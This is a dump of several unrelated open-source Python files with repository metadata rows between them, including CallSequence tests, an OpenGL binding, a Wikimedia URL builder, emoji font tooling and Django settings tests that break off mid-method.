cs = CallSequence(
('a', task_a),
)
assert cs.count == 1
assert cs.get_task('a') == task_a
with pytest.raises(KeyError):
cs.get_task('foo')
def test_has(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
)
assert cs.count == 1
assert cs.has_task('a')
assert not cs.has_task('foo')
def test_replace(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.replace_task('b', lambda : results.append('wheee'))
cs()
assert results == ['a ran', 'wheee']
def test_wrap(self):
results = []
def task_b():
results.append('b ran')
return "task b result"
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', task_b),
)
assert cs.count == 2
def wrapper(t):
assert t == "task b result"
results.append('wrapper ran')
cs.wrap_task('b', wrapper)
cs()
assert results == ['a ran', 'b ran', 'wrapper ran']
def test_returned_seq(self):
results = []
def task_b():
results.append('b ran')
cs2 = CallSequence(
('x', lambda : results.append('x ran')),
('y', lambda : results.append('y ran')),
)
assert cs2.count == 2
return cs2
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', task_b),
('c', lambda : results.append('c ran')),
)
assert cs.count == 3
cs()
assert results == ['a ran', 'b ran', 'x ran', 'y ran', 'c ran']
def test_insert_before_1(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_before('b', ('c', lambda : results.append('c ran')))
assert cs.count == 3
cs()
assert results == ['a ran', 'c ran', 'b ran']
def test_insert_before_2(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_before('a', ('c', lambda : results.append('c ran')))
assert cs.count == 3
cs()
assert results == ['c ran', 'a ran', 'b ran']
def test_insert_before_3(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_before('a', ('c', lambda : results.append('c ran')),
('d', lambda : results.append('d ran')))
assert cs.count == 4
cs()
assert results == ['c ran', 'd ran', 'a ran', 'b ran']
def test_insert_before_4(self):
results = []
cs = CallSequence()
with pytest.raises(KeyError):
cs.insert_before('z', ('c', lambda : results.append('c ran')))
def test_insert_after_1(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_after('b', ('c', lambda : results.append('c ran')))
assert cs.count == 3
cs()
assert results == ['a ran', 'b ran', 'c ran']
def test_insert_after_2(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_after('a', ('c', lambda : results.append('c ran')))
assert cs.count == 3
cs()
assert results == ['a ran', 'c ran', 'b ran']
def test_insert_after_3(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.insert_after('a', ('c', lambda : results.append('c ran')),
('d', lambda : results.append('d ran')))
assert cs.count == 4
cs()
assert results == ['a ran', 'c ran', 'd ran', 'b ran']
def test_insert_after_4(self):
results = []
cs = CallSequence()
with pytest.raises(KeyError):
cs.insert_after('z', ('c', lambda : results.append('c ran')))
| 31.010345 | 74 | 0.469476 |
38099fba8fe0d65ec2eec45fe43d6dea1dbf6b92 | 423 | py | Python | misc_scripts/file_to_bytes.py | jtara1/misc_scripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | 4 | 2018-11-05T10:47:02.000Z | 2022-02-05T08:17:56.000Z | misc_scripts/file_to_bytes.py | jtara1/MiscScripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | 4 | 2017-12-30T20:46:10.000Z | 2018-02-04T00:03:25.000Z | misc_scripts/file_to_bytes.py | jtara1/MiscScripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | null | null | null | import click
@click.command()
@click.argument('file_name', type=click.Path())
@click.argument('output_file_name', default='file_bytes.txt', type=click.Path())
def file_to_bytes(file_name, output_file_name):
# save bytes
with open(file_name, 'rb') as infile:
with open(output_file_name, 'w') as outfile:
outfile.write(str(bytes(infile.read())))
if __name__ == "__main__":
file_to_bytes()
| 26.4375 | 80 | 0.690307 |
61c1d48647e9167255a265fd044fa3243a1c8970 | 761 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 210 | 2016-04-09T14:26:00.000Z | 2022-03-25T18:36:19.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 72 | 2016-09-04T09:30:19.000Z | 2022-03-27T17:06:53.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 64 | 2016-04-09T14:26:49.000Z | 2022-03-21T11:19:47.000Z | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.WGL import _types as _cs
# End users want this...
from OpenGL.raw.WGL._types import *
from OpenGL.raw.WGL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'WGL_NV_render_texture_rectangle'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.WGL,'WGL_NV_render_texture_rectangle',error_checker=_errors._error_checker)
WGL_BIND_TO_TEXTURE_RECTANGLE_RGBA_NV=_C('WGL_BIND_TO_TEXTURE_RECTANGLE_RGBA_NV',0x20A1)
WGL_BIND_TO_TEXTURE_RECTANGLE_RGB_NV=_C('WGL_BIND_TO_TEXTURE_RECTANGLE_RGB_NV',0x20A0)
WGL_TEXTURE_RECTANGLE_NV=_C('WGL_TEXTURE_RECTANGLE_NV',0x20A2)
| 42.277778 | 126 | 0.837057 |
1a074e7c1d1073022cd675818d539842a5c881e8 | 958 | py | Python | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from docs import conf
class UrlBuilder:
"""Class that helps build the urls needed to download the files from wikimedia"""
def __init__(self, hours_backwards):
self._base_link = conf.base_link
self._hours_backwards = hours_backwards
def _get_base_url(self):
year, month = datetime.now().strftime("%Y,%m").split(",")
return f'{self._base_link}{year}/{year}-{month}/'
def get_urls(self):
# Get n URLs based on the hours specified in the configuration file
hours_list = [(datetime.now() - timedelta(hours=x)).strftime("%Y,%m,%d,%H").split(",")
for x in range(self._hours_backwards)]
urls = []
for date in hours_list:
file_name = f'pageviews-{date[0]}{date[1]}{date[2]}-{date[3]}0000'
url = self._get_base_url() + file_name + conf.file_format
urls.append(url)
return urls
| 38.32 | 94 | 0.624217 |
280176591eba40e1ba13623ac64e1e3628eb5bb7 | 4,142 | py | Python | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | null | null | null | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | 8 | 2018-02-05T21:36:53.000Z | 2019-06-21T15:05:41.000Z | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | 4 | 2017-12-06T19:06:01.000Z | 2018-01-11T15:54:58.000Z | from filecmp import cmp
from os import path
from subprocess import run, DEVNULL, PIPE
from sys import executable, stdout, stderr
from py.path import local
from pytest import fixture, mark
import yaml
def test_fixture(accept_batch_fixture):
for k in sorted(vars(accept_batch_fixture)):
print(k, getattr(accept_batch_fixture, k))
with open(accept_batch_fixture.root_dir.join('config.yaml')) as fin:
config = yaml.safe_load(fin)
print()
for k in sorted(config):
print(k, config[k])
assert 'asp_root' in config
assert 'sub_root' in config
assert config['asp_root'] == accept_batch_fixture.asp_root
assert config['sub_root'] == accept_batch_fixture.sub_root
assert accept_batch_fixture.asp_root.isdir()
assert accept_batch_fixture.sub_root.isdir()
assert accept_batch_fixture.input_batch_dir.isdir()
assert (accept_batch_fixture.input_batch_dir / 'meta.yaml').isfile()
def test_can_run_accept_batch(ran_accept_batch):
pass
def test_exit_0(ran_accept_batch):
stdout.write(ran_accept_batch.stdout)
stderr.write(ran_accept_batch.stderr)
assert ran_accept_batch.returncode == 0
def test_batch_dir(ran_accept_batch):
"""{temp_dir}/sub_root/topmed/phase3/biome/01/24a"""
assert ran_accept_batch.output_batch_dir.isdir()
def test_md5_dir(ran_accept_batch):
"""{temp_dir}/sub_root/topmed/phase3/biome/01/24a/md5"""
md5_dir = ran_accept_batch.output_batch_dir / 'md5'
assert md5_dir.isdir()
def test_validation_dir(ran_accept_batch):
"""{temp_dir}/sub_root/topmed/phase3/biome/01/24a/validation"""
validation_dir = ran_accept_batch.output_batch_dir / 'validation'
assert validation_dir.isdir()
def test_state_dir(ran_accept_batch):
"""{temp_dir}/sub_root/topmed/phase3/biome/01/24a/state
contents: current.yaml -> 00.yaml"""
state_dir = ran_accept_batch.output_batch_dir / 'state'
print(repr(state_dir))
assert state_dir.isdir()
state_file = state_dir / '00.yaml'
print(repr(state_file))
assert state_file.isfile()
assert state_file.read_text('ascii') == ran_accept_batch.state_00_contents
current_link = state_dir / 'current.yaml'
print(repr(current_link))
assert current_link.islink()
assert current_link.realpath() == state_file
def test_dest_dir(ran_accept_batch):
"""{temp_dir}/asp_root/BioMe/BioMe_batch24a
contents: meta.yaml containing link to batch_dir"""
assert ran_accept_batch.dest_dir.isdir()
@fixture(scope='module')
def ran_accept_batch(accept_batch_fixture):
args = [executable,
'accept_batch.py',
'tests/resources/accept_batch/topmed/phase3/biome/01/24a/']
cp = run(args, stdin=DEVNULL, stdout=PIPE, stderr=PIPE, encoding='ascii',
env=dict(SHEPHERD_CONFIG_FILE=accept_batch_fixture.config_file))
accept_batch_fixture.stdout = cp.stdout
accept_batch_fixture.stderr = cp.stderr
accept_batch_fixture.returncode = cp.returncode
return accept_batch_fixture
@fixture(scope='module')
def accept_batch_fixture(tmpdir_factory):
return AcceptBatchFixture(tmpdir_factory)
class AcceptBatchFixture:
def __init__(self, tmpdir_factory):
self.resources_path = local('tests/resources')
self.root_dir = tmpdir_factory.mktemp('accept_batch')
self.sub_root = self.root_dir.ensure_dir('sub_root')
self.asp_root = self.root_dir.ensure_dir('asp_root')
self.input_batch_dir = (
self.resources_path / 'accept_batch/topmed/phase3/biome/01/24a'
)
self.output_batch_dir = self.sub_root / 'topmed/phase3/biome/01/24a'
self.dest_dir = self.asp_root / 'BioMe/BioMe_batch24a'
# Main config file
self.config_file = self.root_dir.join('config.yaml')
config = dict(asp_root=str(self.asp_root), sub_root=str(self.sub_root))
self.config_file.write_text(
yaml.dump(config, default_flow_style=False), 'ascii')
# Expected contents state_00.yaml
state_00_yaml = local('tests/resources/state_00.yaml')
self.state_00_contents = state_00_yaml.read_text('ascii')
| 36.017391 | 79 | 0.728392 |
60d250032d65ec25a4b2e1b44d38cab280cc43c4 | 36 | py | Python | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | from .profile import create_profile
| 18 | 35 | 0.861111 |
f1a69811f8f09b15d9d05866143c88455f7fe76e | 1,502 | py | Python | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 84 | 2015-01-01T23:40:15.000Z | 2022-03-10T20:20:40.000Z | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 2,219 | 2015-01-06T20:35:05.000Z | 2022-03-31T23:36:52.000Z | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 127 | 2015-01-02T01:43:51.000Z | 2022-03-24T20:02:13.000Z | from setuptools import setup, find_packages
import os, re
PACKAGE_NAME = "tox-monorepo"
DESCRIPTION = "A tox plugin built to allow sharing of a common tox.ini file across repositories with high package counts."
with open(os.path.join("tox_monorepo", "version.py"), "r") as fd:
version = re.search(
r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE
).group(1)
if not version:
raise RuntimeError("Cannot find version information")
with open("README.md", encoding="utf-8") as f:
long_description = f.read()
setup(
name=PACKAGE_NAME,
description=DESCRIPTION,
version=version,
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Azure/azure-sdk-tools/",
author="Microsoft Corporation",
author_email="azuresdkengsysadmins@microsoft.com",
license="MIT License",
packages=find_packages(),
install_requires=["tox >= 3.12.0"],
entry_points={"tox": ["monorepo=tox_monorepo:monorepo"]},
classifiers=[
"Framework :: tox",
"Development Status :: 3 - Alpha",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
],
)
| 33.377778 | 122 | 0.64514 |
6e2f1cd2c982ceb6ff324d7ea93570a8b6ea90a3 | 2,338 | py | Python | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | 1 | 2021-07-22T20:56:28.000Z | 2021-07-22T20:56:28.000Z | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | null | null | null | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Modify an emoji font to map legacy PUA characters to standard ligatures."""
__author__ = 'roozbeh@google.com (Roozbeh Pournader)'
import sys
import itertools
from fontTools import ttLib
from nototools import font_data
import add_emoji_gsub
def get_glyph_name_from_gsub(char_seq, font):
"""Find the glyph name for ligature of a given character sequence from GSUB.
"""
cmap = font_data.get_cmap(font)
# FIXME: So many assumptions are made here.
try:
first_glyph = cmap[char_seq[0]]
rest_of_glyphs = [cmap[ch] for ch in char_seq[1:]]
except KeyError:
return None
for lookup in font['GSUB'].table.LookupList.Lookup:
ligatures = lookup.SubTable[0].ligatures
try:
for ligature in ligatures[first_glyph]:
if ligature.Component == rest_of_glyphs:
return ligature.LigGlyph
except KeyError:
continue
return None
def add_pua_cmap(source_file, target_file):
"""Add PUA characters to the cmap of the first font and save as second."""
font = ttLib.TTFont(source_file)
cmap = font_data.get_cmap(font)
for pua, (ch1, ch2) in itertools.chain(
add_emoji_gsub.EMOJI_KEYCAPS.items(), add_emoji_gsub.EMOJI_FLAGS.items()
):
if pua not in cmap:
glyph_name = get_glyph_name_from_gsub([ch1, ch2], font)
if glyph_name is not None:
cmap[pua] = glyph_name
font.save(target_file)
def main(argv):
"""Save the first font given to the second font."""
add_pua_cmap(argv[1], argv[2])
if __name__ == '__main__':
main(sys.argv)
| 31.173333 | 81 | 0.664671 |
f3221bc0635e17ee25d87083f92efa7cf9d2f545 | 1,064 | py | Python | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | 2 | 2021-12-30T01:49:14.000Z | 2022-03-31T09:09:18.000Z | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | null | null | null | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# Put this file in the location mmf/models/
from mmf.common.registry import registry
from mmf.models.mma_sr import M4C
@registry.register_model("m4c_captioner")
class M4CCaptioner(M4C):
def __init__(self, config):
super().__init__(config)
print(M4CCaptioner.__bases__)
self.remove_unk_in_pred = self.config.remove_unk_in_pred
print("real_m4c_captioner")
@classmethod
def config_path(cls):
return "configs/models/m4c_captioner/defaults.yaml"
# def _forward_output(self, sample_list, fwd_results):
# super()._forward_output(sample_list, fwd_results)
#
# if self.remove_unk_in_pred:
# # avoid outputting <unk> in the generated captions
# if 'crude_scores' in fwd_results.keys():
# fwd_results["crude_scores"][..., self.answer_processor.UNK_IDX] = -1e10
# else:
# fwd_results["scores"][..., self.answer_processor.UNK_IDX] = -1e10
#
# return fwd_results
| 35.466667 | 90 | 0.660714 |
6b2ca3e0a5b5395ef4267e5404a0a4908202cd85 | 15,789 | py | Python | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | 2 | 2016-07-23T18:08:37.000Z | 2016-07-24T09:54:34.000Z | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | null | null | null | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
from types import ModuleType
import unittest
import warnings
from django.conf import LazySettings, Settings, settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpRequest
from django.test import (SimpleTestCase, TransactionTestCase, TestCase,
modify_settings, override_settings, signals)
from django.utils import six
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], ITEMS_OUTER=[1, 2, 3],
TEST='override', TEST_OUTER='outer')
class FullyDecoratedTranTestCase(TransactionTestCase):
available_apps = []
def test_override(self):
self.assertListEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertListEqual(settings.ITEMS_OUTER, [1, 2, 3])
self.assertEqual(settings.TEST, 'override')
self.assertEqual(settings.TEST_OUTER, 'outer')
@modify_settings(ITEMS={
'append': ['e', 'f'],
'prepend': ['a'],
'remove': ['d', 'c'],
})
def test_method_list_override(self):
self.assertListEqual(settings.ITEMS, ['a', 'b', 'e', 'f'])
self.assertListEqual(settings.ITEMS_OUTER, [1, 2, 3])
@modify_settings(ITEMS={
'append': ['b'],
'prepend': ['d'],
'remove': ['a', 'c', 'e'],
})
def test_method_list_override_no_ops(self):
self.assertListEqual(settings.ITEMS, ['b', 'd'])
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
def test_method_list_override_strings(self):
self.assertListEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
@modify_settings(ITEMS={'remove': ['b', 'd']})
@modify_settings(ITEMS={'append': ['b'], 'prepend': ['d']})
def test_method_list_override_nested_order(self):
self.assertListEqual(settings.ITEMS, ['d', 'c', 'b'])
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
self.assertEqual(settings.TEST_OUTER, 'outer')
def test_decorated_testcase_name(self):
self.assertEqual(FullyDecoratedTranTestCase.__name__, 'FullyDecoratedTranTestCase')
def test_decorated_testcase_module(self):
self.assertEqual(FullyDecoratedTranTestCase.__module__, __name__)
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], TEST='override')
class FullyDecoratedTestCase(TestCase):
def test_override(self):
self.assertListEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertEqual(settings.TEST, 'override')
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
@override_settings(TEST='override2')
def test_method_override(self):
self.assertListEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
self.assertEqual(settings.TEST, 'override2')
class ClassDecoratedTestCaseSuper(TestCase):
"""
Dummy class for testing max recursion error in child class call to
super(). Refs #17011.
"""
def test_max_recursion_error(self):
pass
@override_settings(TEST='override')
class ClassDecoratedTestCase(ClassDecoratedTestCaseSuper):
def test_override(self):
self.assertEqual(settings.TEST, 'override')
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
def test_max_recursion_error(self):
"""
Overriding a method on a super class and then calling that method on
the super class should not trigger infinite recursion. See #17011.
"""
try:
super(ClassDecoratedTestCase, self).test_max_recursion_error()
except RuntimeError:
self.fail()
@modify_settings(ITEMS={'append': 'mother'})
@override_settings(ITEMS=['father'], TEST='override-parent')
class ParentDecoratedTestCase(TestCase):
pass
@modify_settings(ITEMS={'append': ['child']})
@override_settings(TEST='override-child')
class ChildDecoratedTestCase(ParentDecoratedTestCase):
def test_override_settings_inheritance(self):
self.assertEqual(settings.ITEMS, ['father', 'mother', 'child'])
self.assertEqual(settings.TEST, 'override-child')
class SettingsTests(TestCase):
def setUp(self):
self.testvalue = None
signals.setting_changed.connect(self.signal_callback)
def tearDown(self):
signals.setting_changed.disconnect(self.signal_callback)
def signal_callback(self, sender, setting, value, **kwargs):
if setting == 'TEST':
self.testvalue = value
def test_override(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_change(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test2'
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_doesnt_leak(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test'
self.assertRaises(AttributeError, getattr, settings, 'TEST')
@override_settings(TEST='override')
def test_decorator(self):
self.assertEqual('override', settings.TEST)
def test_context_manager(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
override = override_settings(TEST='override')
self.assertRaises(AttributeError, getattr, settings, 'TEST')
override.enable()
self.assertEqual('override', settings.TEST)
override.disable()
self.assertRaises(AttributeError, getattr, settings, 'TEST')
def test_class_decorator(self):
# SimpleTestCase can be decorated by override_settings, but not ut.TestCase
class SimpleTestCaseSubclass(SimpleTestCase):
pass
class UnittestTestCaseSubclass(unittest.TestCase):
pass
decorated = override_settings(TEST='override')(SimpleTestCaseSubclass)
self.assertIsInstance(decorated, type)
self.assertTrue(issubclass(decorated, SimpleTestCase))
with six.assertRaisesRegex(self, Exception,
"Only subclasses of Django SimpleTestCase*"):
decorated = override_settings(TEST='override')(UnittestTestCaseSubclass)
def test_signal_callback_context_manager(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual(self.testvalue, 'override')
self.assertEqual(self.testvalue, None)
@override_settings(TEST='override')
def test_signal_callback_decorator(self):
self.assertEqual(self.testvalue, 'override')
#
# Regression tests for #10130: deleting settings.
#
def test_settings_delete(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
del settings.TEST
self.assertRaises(AttributeError, getattr, settings, 'TEST')
def test_settings_delete_wrapped(self):
self.assertRaises(TypeError, delattr, settings, '_wrapped')
def test_override_settings_delete(self):
"""
Allow deletion of a setting in an overridden settings set (#18824)
"""
previous_i18n = settings.USE_I18N
previous_l10n = settings.USE_L10N
with self.settings(USE_I18N=False):
del settings.USE_I18N
self.assertRaises(AttributeError, getattr, settings, 'USE_I18N')
# Should also work for a non-overridden setting
del settings.USE_L10N
self.assertRaises(AttributeError, getattr, settings, 'USE_L10N')
self.assertEqual(settings.USE_I18N, previous_i18n)
self.assertEqual(settings.USE_L10N, previous_l10n)
def test_override_settings_nested(self):
"""
Test that override_settings uses the actual _wrapped attribute at
runtime, not when it was instantiated.
"""
self.assertRaises(AttributeError, getattr, settings, 'TEST')
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
inner = override_settings(TEST2='override')
with override_settings(TEST='override'):
self.assertEqual('override', settings.TEST)
with inner:
self.assertEqual('override', settings.TEST)
self.assertEqual('override', settings.TEST2)
# inner's __exit__ should have restored the settings of the outer
# context manager, not those when the class was instantiated
self.assertEqual('override', settings.TEST)
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
self.assertRaises(AttributeError, getattr, settings, 'TEST')
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
def test_allowed_include_roots_string(self):
"""
ALLOWED_INCLUDE_ROOTS is not allowed to be incorrectly set to a string
rather than a tuple.
"""
self.assertRaises(ValueError, setattr, settings,
'ALLOWED_INCLUDE_ROOTS', '/var/www/ssi/')
class TestComplexSettingOverride(TestCase):
def setUp(self):
self.old_warn_override_settings = signals.COMPLEX_OVERRIDE_SETTINGS.copy()
signals.COMPLEX_OVERRIDE_SETTINGS.add('TEST_WARN')
def tearDown(self):
signals.COMPLEX_OVERRIDE_SETTINGS = self.old_warn_override_settings
self.assertFalse('TEST_WARN' in signals.COMPLEX_OVERRIDE_SETTINGS)
def test_complex_override_warning(self):
"""Regression test for #19031"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
with override_settings(TEST_WARN='override'):
self.assertEqual(settings.TEST_WARN, 'override')
self.assertEqual(len(w), 1)
# File extension may by .py, .pyc, etc. Compare only basename.
self.assertEqual(os.path.splitext(w[0].filename)[0],
os.path.splitext(__file__)[0])
self.assertEqual(str(w[0].message),
'Overriding setting TEST_WARN can lead to unexpected behavior.')
class TrailingSlashURLTests(TestCase):
"""
Tests for the MEDIA_URL and STATIC_URL settings.
They must end with a slash to ensure there's a deterministic way to build
paths in templates.
"""
settings_module = settings
def setUp(self):
self._original_media_url = self.settings_module.MEDIA_URL
self._original_static_url = self.settings_module.STATIC_URL
def tearDown(self):
self.settings_module.MEDIA_URL = self._original_media_url
self.settings_module.STATIC_URL = self._original_static_url
def test_blank(self):
"""
The empty string is accepted, even though it doesn't end in a slash.
"""
self.settings_module.MEDIA_URL = ''
self.assertEqual('', self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = ''
self.assertEqual('', self.settings_module.STATIC_URL)
def test_end_slash(self):
"""
It works if the value ends in a slash.
"""
self.settings_module.MEDIA_URL = '/foo/'
self.assertEqual('/foo/', self.settings_module.MEDIA_URL)
self.settings_module.MEDIA_URL = 'http://media.foo.com/'
self.assertEqual('http://media.foo.com/',
self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = '/foo/'
self.assertEqual('/foo/', self.settings_module.STATIC_URL)
self.settings_module.STATIC_URL = 'http://static.foo.com/'
self.assertEqual('http://static.foo.com/',
self.settings_module.STATIC_URL)
def test_no_end_slash(self):
"""
An ImproperlyConfigured exception is raised if the value doesn't end
in a slash.
"""
with self.assertRaises(ImproperlyConfigured):
self.settings_module.MEDIA_URL = '/foo'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.MEDIA_URL = 'http://media.foo.com'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.STATIC_URL = '/foo'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.STATIC_URL = 'http://static.foo.com'
def test_double_slash(self):
"""
If the value ends in more than one slash, presume they know what
they're doing.
"""
self.settings_module.MEDIA_URL = '/stupid//'
self.assertEqual('/stupid//', self.settings_module.MEDIA_URL)
self.settings_module.MEDIA_URL = 'http://media.foo.com/stupid//'
self.assertEqual('http://media.foo.com/stupid//',
self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = '/stupid//'
self.assertEqual('/stupid//', self.settings_module.STATIC_URL)
self.settings_module.STATIC_URL = 'http://static.foo.com/stupid//'
self.assertEqual('http://static.foo.com/stupid//',
self.settings_module.STATIC_URL)
class SecureProxySslHeaderTest(TestCase):
settings_module = settings
def setUp(self):
self._original_setting = self.settings_module.SECURE_PROXY_SSL_HEADER
def tearDown(self):
self.settings_module.SECURE_PROXY_SSL_HEADER = self._original_setting
def test_none(self):
self.settings_module.SECURE_PROXY_SSL_HEADER = None
req = HttpRequest()
self.assertEqual(req.is_secure(), False)
def test_set_without_xheader(self):
self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
req = HttpRequest()
self.assertEqual(req.is_secure(), False)
def test_set_with_xheader_wrong(self):
self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'wrongvalue'
self.assertEqual(req.is_secure(), False)
def test_set_with_xheader_right(self):
